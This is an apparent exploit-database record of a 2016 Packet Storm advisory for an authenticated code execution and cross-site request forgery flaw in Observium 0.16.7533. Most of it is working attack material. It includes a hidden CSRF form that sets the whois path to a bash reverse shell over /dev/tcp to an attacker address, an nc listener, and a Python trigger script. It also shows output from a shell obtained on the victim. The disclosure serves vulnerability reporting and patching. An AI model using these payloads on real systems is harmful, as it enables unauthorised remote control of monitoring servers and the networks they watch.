{"id": "PACKETSTORM:136859", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Observium 0.16.7533 Code Execution / Cross Site Request Forgery", "description": "", "published": "2016-04-30T00:00:00", "modified": "2016-04-30T00:00:00", "cvss": {"vector": "NONE", "score": 0.0}, "href": "https://packetstormsecurity.com/files/136859/Observium-0.16.7533-Code-Execution-Cross-Site-Request-Forgery.html", "reporter": "Dolev Farhi", "references": [], "cvelist": [], "lastseen": "2016-11-03T10:22:27", "viewCount": 4, "enchantments": {"score": {"value": 0.2, "vector": "NONE", "modified": "2016-11-03T10:22:27", "rev": 2}, "dependencies": {"references": [], "modified": "2016-11-03T10:22:27", "rev": 2}, "vulnersScore": 0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/136859/observium0167533-execxsrf.txt", "sourceData": "`# Exploit title: Observium Commercial - Authenticated RCE \n# Author: Dolev Farhi \n# Contact: dolevf at protonmail.com \n# Date: 28-04-2016 \n# Vendor homepage: http://observium.org/ \n# Software version: CE 0.16.7533 \n \nAuthenticated remote code execution \nUsing either CSRF or by editing the whois binary field in the Observium webui under Settings-> System Path, an attacker may also change the Path to either [whois, mtr, nmap] to any bash command, and by hitting the url: http://<ObserviumIP>/netcmd.php?cmd=whois&query=8.8.8.8 \nusing any user on Observium (even low privileged) we can trigger a code execution. for example. setting up a listener \n \nroot@pt:~# nc -lvp 4444 \nlistening on [any] 4444 ... \n \nand a CSRF which looks like this: \n \n<!-- \n<html> \n<div align=\"center\"> \n<pre> \n \n<h2><b>CSRF<b></h2> \n<body> \n<form \naction=\"http://<observiumIP>/settings/section=paths/\" \nmethod=\"POST\"> \n<input type=\"hidden\" name=\"temp_dir\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_temp_dir\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_rrdtool\" value=\"\" /> \n<input type=\"hidden\" name=\"fping\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_fping\" value=\"\" /> \n<input type=\"hidden\" name=\"fping6\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_fping6\" value=\"\" /> \n<input type=\"hidden\" name=\"svn\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_svn\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpget\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpget\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpbulkget\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpbulkget\" value=\"\" /> \n<input type=\"hidden\" name=\"snmpbulkwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmpbulkwalk\" value=\"\" /> \n<input type=\"hidden\" name=\"snmptranslate\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_snmptranslate\" value=\"\" /> \n<input type=\"hidden\" name=\"ipmitool\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_ipmitool\" value=\"\" /> \n<input type=\"hidden\" name=\"virsh\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_virsh\" value=\"\" /> \n<input type=\"hidden\" name=\"wmic\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_wmic\" value=\"\" /> \n<input type=\"hidden\" name=\"git\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_git\" value=\"\" /> \n<input type=\"hidden\" name=\"whois\" value=\"bash -i >& /dev/tcp/192.168.2.222/4444 0>&1; exit\" /> \n<input type=\"hidden\" name=\"varset_whois\" value=\"\" /> \n<input type=\"hidden\" name=\"whois_custom\" value=\"1\" /> \n<input type=\"hidden\" name=\"file\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_file\" value=\"\" /> \n<input type=\"hidden\" name=\"dot\" value=\"\" /> \n<input type=\"hidden\" name=\"varset_dot\" value=\"\" /> \n<input type=\"submit\" name=\"submit\" value=\"save\" /> \n</form> \n</body> \n</div> \n</html> \n \nor by changing the field of Path to 'whois' binary to 'bash -i >& /dev/tcp/attackerip/4444 0>&1; exit' and then visiting http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8, we trigger the code that is defined in the \nwhois parameter which gives us a reverse shell on the machine: \n \nyou may also use the following python instead: \n \n\"\"\" \nimport sys \nimport urllib \nimport urllib2 \nimport cookielib \n \n#!/usr/bin/python \nusername = 'test' \npassword = '123456' \ntimeout = 10 \n \ntry: \ncj = cookielib.CookieJar() \nopener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) \nlogin_data = urllib.urlencode({'username' : username, 'password' : password, 'submit' : ''}) \nopener.open('http://observium-server', login_data, timeout=timeout) \nurl = 'http://observium-server/netcmd.php?cmd=whois&query=8.8.8.8' \nresp = opener.open(url) \n \nexcept Exception, e: \nprint e \nsys.exit(1) \n\"\"\" \n \nlistening on [any] 4444 ... \n192.168.2.155: inverse host lookup failed: Unknown host \nconnect to [192.168.2.222] from (UNKNOWN) [192.168.2.155] 52413 \nbash: no job control in this shell \nbash: /root/.bashrc: Permission denied \nbash-4.1$ ls -l /opt \nls -l /opt \ntotal 48944 \ndrwxrwxr-x 12 1000 1000 4096 Apr 27 13:47 observium \n-rw-r--r-- 1 root root 50107191 Jan 27 07:35 observium-community-latest.tar.gz \ndrwxr-xr-x. 2 root root 4096 Mar 26 2015 rh \n \n`\n"}

{}